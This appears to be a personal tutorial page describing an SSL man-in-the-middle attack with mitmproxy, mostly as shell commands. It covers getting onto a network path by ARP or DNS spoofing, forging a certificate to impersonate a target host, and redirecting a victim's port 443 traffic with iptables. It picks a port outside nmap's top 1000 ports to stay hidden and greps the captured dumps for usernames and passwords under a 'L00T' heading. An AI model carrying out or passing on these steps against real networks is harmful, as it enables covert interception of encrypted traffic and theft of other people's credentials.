SSL MITM WITH MITMPROXY

INTRO

first of all, you need to be on the network path, be it as the existing gateway or by means of dns or arp spoofing, whatsoever. in any case, make sure you have a working gateway and resolvers yourself so you can relay the traffic. from the client's side the network path looks right, except for the first hop.

you can run mitmproxy as an unprivileged user on a local and exotic port, as long as you enable the interception (the redirect rules below).

there are two ways to go for ssl interception

INSTALL

either as a package, from scratch, or using the latest released binaries

as package

#apt install mitmproxy
#dpkg -l | grep mitm

from scratch

apt install python3 python3-venv
#python3-pip

git clone https://github.com/mitmproxy/mitmproxy.git
cd mitmproxy/

./dev.sh
. venv/bin/activate
mitmproxy --version

grab the latest release

as root

wget https://snapshots.mitmproxy.org/7.0.4/mitmproxy-7.0.4-linux.tar.gz
mkdir -p mitm/
tar xzf mitmproxy-7.0.4-linux.tar.gz -C mitm/
ls -alF mitm/
chown root:root mitm/*
mv mitm/* /usr/local/bin/
rmdir mitm/

SELF-SIGNED

as user

let's have a look at what you need to impersonate

echo Q | openssl s_client -servername TARGET-VHOST -connect TARGET-HOST:443 \
    | openssl x509 -noout -text

ideally you would get a genuine cert, but a self-signed one is enough for a PoC

cd ~/certs/
openssl req -x509 -newkey rsa:2048 -nodes \
    -subj /CN=DOMAIN \
    -keyout DOMAIN.self.key \
    -out DOMAIN.self.crt

mitmproxy wants CRT + KEY concatenated into a single PEM file

cat DOMAIN.self.crt DOMAIN.self.key > DOMAIN.self.pem
chmod 400 *.crt *.key *pem

SSL MITM

start the mitm service either with a TUI (this truly eats your memory) or in tcpdump-alike style (writes to a file)

TEXT / ON-THE-FLY MODE

echo $LANG
#export LANG=en_US.UTF-8

mitmproxy --version
mitmproxy -h | less
mitmproxy --options | less

mitmproxy -p 33231 \
    --set block_global=false \
    --mode transparent --showhost \
    --set console_mouse=false

ls -alF $HOME/.mitmproxy/

TEXT / TARGETED MODE

now sniffing ONLY example.net and passing the rest through untouched. same as above but with

    --ignore-hosts '^(?![0-9\.]+:)(?!([^\.:]+\.)*example\.net:)' \
    --certs example.net=example.net.self.pem
    # --ssl-insecure

DUMP / TARGETED MODE

mitmdump --version
mitmdump -h | less
mitmdump --options | less

don’t ask me why we need an absolute path there

mkdir -p /data/dumps/
date=`date +%s`
export MITMPROXY_SSLKEYLOGFILE="/data/dumps/$date.sslkeylogfile.txt"
#SSLKEYLOGFILE=

echo $date
#echo $SSLKEYLOGFILE
echo $MITMPROXY_SSLKEYLOGFILE

mitmdump -p 33231 \
    --set block_global=false \
    --mode transparent --showhost \
    --ignore-hosts '^(?![0-9\.]+:)(?!([^\.:]+\.)*example\.net:)' \
    --certs example.net=$HOME/certs/example.net.pem \
    -w /data/dumps/$date.mitmdump --flow-detail 0
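the --ignore-hosts pattern above is easy to get backwards: mitmproxy checks it against "host:port" and a MATCH means pass-through, so the two negative lookaheads carve out what is NOT ignored (IP literals and example.net with its subdomains). added example, not from the page or the mitmproxy project, with constructed host:port inputs, to check what the pattern really does before pointing it at traffic:

```python
import re

# the exact pattern from the mitmdump command above
IGNORE_HOSTS = re.compile(r'^(?![0-9\.]+:)(?!([^\.:]+\.)*example\.net:)')


def is_ignored(host_port: str) -> bool:
    """True when mitmproxy would pass the connection through untouched.

    mitmproxy evaluates ignore_hosts with a regex search on "host:port";
    because the pattern is anchored with ^ and only consists of lookaheads,
    it matches (i.e. ignores) everything except what the lookaheads exclude.
    """
    return IGNORE_HOSTS.search(host_port) is not None


def classify(hosts):
    """Map each host:port to 'passthrough' or 'intercepted'."""
    return {h: ("passthrough" if is_ignored(h) else "intercepted") for h in hosts}


if __name__ == "__main__":
    # constructed inputs: the target, a subdomain, an IP literal, an unrelated
    # site and two look-alikes that must NOT be intercepted by accident
    sample = [
        "example.net:443",
        "api.example.net:443",
        "203.0.113.10:443",
        "example.com:443",
        "notexample.net:443",
        "example.net.evil.test:443",
    ]
    for host, verdict in classify(sample).items():
        print(f"{host:30s} {verdict}")
```

note that the `:` at the end of the lookaheads is what stops `notexample.net` and `example.net.evil.test` from being intercepted; drop it and the filter widens silently.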

INTERCEPTION

mitmproxy's default port is 8080, used for both http and https. we want a port that is not in nmap's top 1000 to remain hidden.

sysctl -w net.ipv4.ip_forward=1
sysctl net.ipv4.ip_forward

sysctl -w net.ipv4.conf.eth0.send_redirects=0
sysctl net.ipv4.conf.eth0.send_redirects

nic=virbr0
iptables -t nat -A PREROUTING -i $nic -p tcp --dport 443 -j REDIRECT --to-port 33231
iptables -nvL -t nat

ACCEPTANCE

from the victim/client

curl -i https://example.net/
curl -ik https://example.net/

L00T & FINE TUNE

netstat -lntup
cd /data/dumps/
grep -a UserName $date.mitmdump
grep -a Password $date.mitmdump

refine your filter offline

cd /data/dumps/
mitmdump -nr $date.mitmdump "~m get"
mitmdump -nr $date.mitmdump "~m post"

RESOURCES

mitmproxy

Introduction https://docs.mitmproxy.org/stable/

Wireshark and SSL/TLS Master Secrets https://docs.mitmproxy.org/stable/howto-wireshark-tls/

Transparent Proxy https://docs.mitmproxy.org/stable/concepts-modes/#transparent-proxy

Transparent Proxying https://mitmproxy.readthedocs.io/en/v2.0.2/transparent.html

Mitmproxy Core Features https://docs.mitmproxy.org/stable/overview-features/

How To: Use mitmproxy to read and modify HTTPS traffic https://blog.heckel.xyz/2013/07/01/how-to-use-mitmproxy-to-read-and-modify-https-traffic-of-your-phone/

ignore domains

Ignoring Domains https://docs.mitmproxy.org/master/howto-ignoredomains/

Ignore Domains https://mitmproxy.readthedocs.io/en/v2.0.2/features/passthrough.html

Ignor regex exclude not working #3013 https://github.com/mitmproxy/mitmproxy/issues/3013

fine tune

mitmdump https://mitmproxy.readthedocs.io/en/v2.0.2/mitmdump.html

Filter expressions https://mitmproxy.readthedocs.io/en/v2.0.2/features/filters.html

nmap

Top 1,000 TCP and UDP ports (nmap default) https://nullsec.us/top-1-000-tcp-and-udp-ports-nmap-default/

Port Selection Data and Strategies https://nmap.org/book/performance-port-selection.html

SecLists/Discovery/Infrastructure/nmap-top1000-ports.txt https://github.com/danielmiessler/SecLists/blob/master/Discovery/Infrastructure/nmap-top1000-ports.txt

Copyright © 2024 Pierre-Philipp Braun